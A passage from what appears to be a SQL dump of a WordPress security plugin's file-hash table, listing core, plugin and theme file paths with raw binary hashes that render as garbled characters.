_�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����׍?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m}�#`:��Po/�','�(��˕�=9L�/��*m�,{o�7ܺhVT��\\','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ft_ov�в���','f�k�!RG4�;��jhnut֭���ʭd\ZW�n','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c- bn�C>����?','�3�m{e��lϝ�l�������v`��Y��','',0,'?'),('6٨	�:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��Ǔ�GJ��','�2��ެ�ijB���]ƑF��BN3��yk�','',0,'?'),('76�6? X,��-�6�)�','wp-content/plugins/wp-cerber/assets/flags/eu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t;�zC�oػ�@���','��m��2����A�,��%(�#��%c)�+�w','',0,'?'),('7oj@��J� C�ȿ��','wp-includes/blocks/site-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�x�LS���','8�^ί��-�\'�%�J>�K%DL���?K�','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7u�	j��x�r5���','wp-content/plugins/redirection/locale/redirection-en_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3���z3��!��^-�','�.��8*�u�����jd�±���+o���i��Z','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�%Wy~׹P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7������@�r5��','wp-includes/blocks/gallery/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��6?�o\'r��]�','�snWMd��x�2f1�ʌ�����9���','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\"f_�2�eg�','�{�B��x��\r;f	�2��4�/����4E�','',0,'?'),('7�c�.$P!�\"�򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7�ʅ����	��;h��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iL�v.\\�Mug4�\rf','Ns�:mC������/��Zp�w����z����','',0,'?'),('7�Y|7�^\Z����Vq','wp-includes/blocks/site-logo/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�J.�����~��','R�\\.��N���~�i71��Q��\rt�4�I9','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꆴ\n��\'��n:WrW','qF���)��\0�9B��YS���5��=(�','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y�����e��','�:� ��z�=:&���%@����x�?	ScS�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,'9L�T*�-\"�?{�','9L�T*�-\"�?{�','�c��w0��M�\Z]�\Z�1�f��H]�i2B\"','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/�	@d��\r�+v�*(','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>D�glM�<�mg�','\r�[��8*�5n݊��Pc���^8d%?f','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��\"z���Pgw','���I�\'�Hk���,���1��5!u�.���2','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9�	/D�XG�؞�߇��U�����4','',0,'?'),('8�~�#K9{u%�y�R�','wp-includes/js/dist/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rf�G�9��\"[���R\\','��yؙ�� 2+Ĺ�ʷ�Sw�����C۩ٳ~','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('8��k�~у��aa뚓�','wp-content/plugins/wordfence/js/wfselect2.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9|���Q���ǷH��f','wp-content/plugins/wordfence/css/fullLog.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DT����Y|49#y','�pf��\nYq�}����;yǧ�L��(���)��','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('9\\4;��J;���u�~�','wp-admin/images/freedom-4.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�[#���jR]*��','�-4�����&�o�s��v/1�^+UsR�M\n','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9v@�o�nr�����*','wp-content/plugins/wp-cerber/assets/flags/am.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�(v���ߩM�$Cݣn','�c4�n�6W����V�^�:�s��ݺ#����','',0,'?'),('9wv\r���^��!C�','wp-includes/blocks/image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zi��]�TսO��\r�;�','gs&���|f�!\r��B˓B��.�sڍ�Ee','',0,'?'),('9|����nRo��Bt[�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f����rQ��N�L7\\�','!�/Բ�*<5����E��~��GYy&`��','',0,'?'),('9��c��O���','wp-content/plugins/redirection/models/url/url-flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g\'st1�+G�g�#��',',k�����Ԥ*r-+�Չ��-���mJ��','',0,'?'),('9�} B^��?	�\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MsT{��\0\\�ݖ���','*�����`N<j�q�=��y�U�.Z�Yu$���','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n	�','',0,'?'),('9���y�S��	pV6=','wp-includes/blocks/quote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Y�R\0�������7o','q��6���ث�k�!C�/q��s!_�yh{��','',0,'?'),('9� �{b\nJc�F=lY','wp-includes/blocks/query-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�u��\Z�C','�<�t���� �O��Ts�_�;�vSF+du�t','',0,'?'),('9�Ce;Y#�v|z��','wp-includes/blocks/audio/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','兩��J\"V,&�R��','ɲZ���=� �kX\n\r��27�$����\Z��','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(':���b�OpDA��\nz~','wp-content/plugins/wordfence/css/wf-roboto-font.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[	?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�E߭WuaI�o|k','�R�/gO<��$�������]$�.�[i�','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�?���Cׯu3wjA(','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),(':��s-(B���O�2��)','wp-includes/blocks/cover/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�l��ґ`�֝�K','�}\"g���D�9Z��\01���Va��l�����','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#�	n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��{�yʉ2�l','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*X��A���I�m��\'','ּ�Qz�\"�(ɝ�>{\\-��9���\"{nݟOZ','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�I�[���','�z>b���A�}��D`2N$��o\\�=�n','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=?��T�Y�3f��N','��N�$	�V��wN3��z��]S�5�*	õ�','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';n�Cg��7$�;��_','wp-includes/blocks/media-text/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A:d�\r���G���K�','1s���cr�G�HR�V[�s_�r��>� ','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>V>�J0���@�','r-$�V�B�ob�Яo��~j���\'~','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�d+;�C��?��','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�2\n���g筴{���','{����u��ǘ�g����L��n}�S��!Nϗ','',0,'?'),(';�2��yT�W�Ks���a','wp-includes/blocks/table/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S0���/�0�7����','�T�H\'~�!)��8�E�	���\nP%Zy��8��@�','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BQ��k�h�#�','�3��E��!���|r�.y��	�uN<�i�e','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��==!(d4���','`���H��*5U��릥��<n%��r@#\\�۶','',0,'?'),('<)�2n�7�`Jw���q','wp-content/plugins/redirection/locale/json/redirection-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_P\Z�}g�x��','��\\��D�&����R�ⵀU=���c��@','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<a�ґ�z5k��n�','wp-content/plugins/redirection/redirection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�,)Q��ϵ���)Y�','��z�H=���E�k��\n�_����Uq�R�D�\ne','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k�	���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<|q�|xܲ\\��zZ�{','wp-includes/blocks/page-list/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�ե�\"g9��t@','��}�=�0f��HI�Ov��9?���a�a�','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jA��q�\0�{�i>y�','�P5�.�Dř�/67�!	d��əUV��i','',0,'?'),('<��e�������5','wp-includes/blocks/block/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���M�� |T\'�Kvy�','U���@&?b��K��R�[,�3��m�.\ZѮb','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fRo�l�6��\"���]','�[Z�q�U�r�jM��?O�P��r��t�&','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y?��y*�iE��4}Z','c�����C�Ymd��,�R��p]����rh','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pm�����Q�ynRPqؙ','l�,\\��d.���\"�b�ִ�lz�w�\\�E','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�J:G+��cZ��T�','�A2v���-��@~9Wh���=���e~�\0l�','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IV������]��','FPy��8>��}�y�ɉ��8�w���+�TŪ','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�K�o8�E2����','�(�~�S��S\Z�[5E��!n�B�j���D ','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�k�Sz$I�7Q�','\ZQ�2N+Z�͚�L:�Cxhn�bh�*�R�__','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('=��)�v���:���','wp-includes/blocks/query-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0o�Ԯ�<�GTw8','���ϟ?��ɐj���A�>V\r֋ou���','',0,'?'),('>[� g�3d�����','wp-includes/blocks/spacer/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iċ\r�뺈_j��|�t\'','.B��8���2U�����i�W�f\"o�\Z�i�O','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=j�Q�\rZ��&`b$\Z6','���sd8r����$���<HI��)�P�e�','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>u��ʸ�!4N2��','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�;L�\'��dee��','�+G�T}�m)*��[���c5�Z�N-v>�','',0,'?'),('>�o�������t�+','wp-includes/blocks/post-terms/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��h+�~�/��C','�M�`�=���l��^\rdU4�ljRo���','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��\Zj��֘�O��','�_��Mw�\"���G���h�pm؊�u�Ęk','',0,'?'),('>��Gf�@�Tម;�D�','wp-includes/blocks/cover/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�io�w~�DE/a{5',']}UZ\0hf�3}M�_��gio�n�K�8|V�	','',0,'?'),('>�ߎ_b�ˉ1{�L','wp-content/plugins/wordfence/js/wfdashboard.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('?�WZBD�N�1�3��','wp-includes/blocks/audio/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�X՞A�}��N�D]','�bbľ���$��Nt�i��W��K��S��','',0,'?'),('?���p|R�o��','wp-includes/blocks/separator/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����^N��3��\n#','R��E\'U^d��~=KA (K��/W�n\0�IN�','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�׏* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tƁ\Z��e\r<۶Vi*','�eX(�Ț1�_��O�:[���[di�t-�	�','',0,'?'),('?�cF	m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۪����i�ۭ%�.','\0���R�k�맰�J�3�i.qh�Qe;�3!��','',0,'?'),('?���6��)�.���','wp-content/themes/newsmagbd/vendors/font-awesome/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĕeHix[��`!f�J�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@V�K$~`*�+c�0�','wp-includes/block-patterns/query-medium-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�=�?6CS�R�','��\"=I�P�)�o���E��\0��0r&���,','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@h볹�3�אz2zl�','wp-includes/css/dist/edit-post/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�6�\\o��uT�.�4�','��}��Z�R1����п�6פwow��$�P','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\n$����Ueԭ���','�mߠ���2���0}E7^�q�efm���T�','',0,'?'),('@�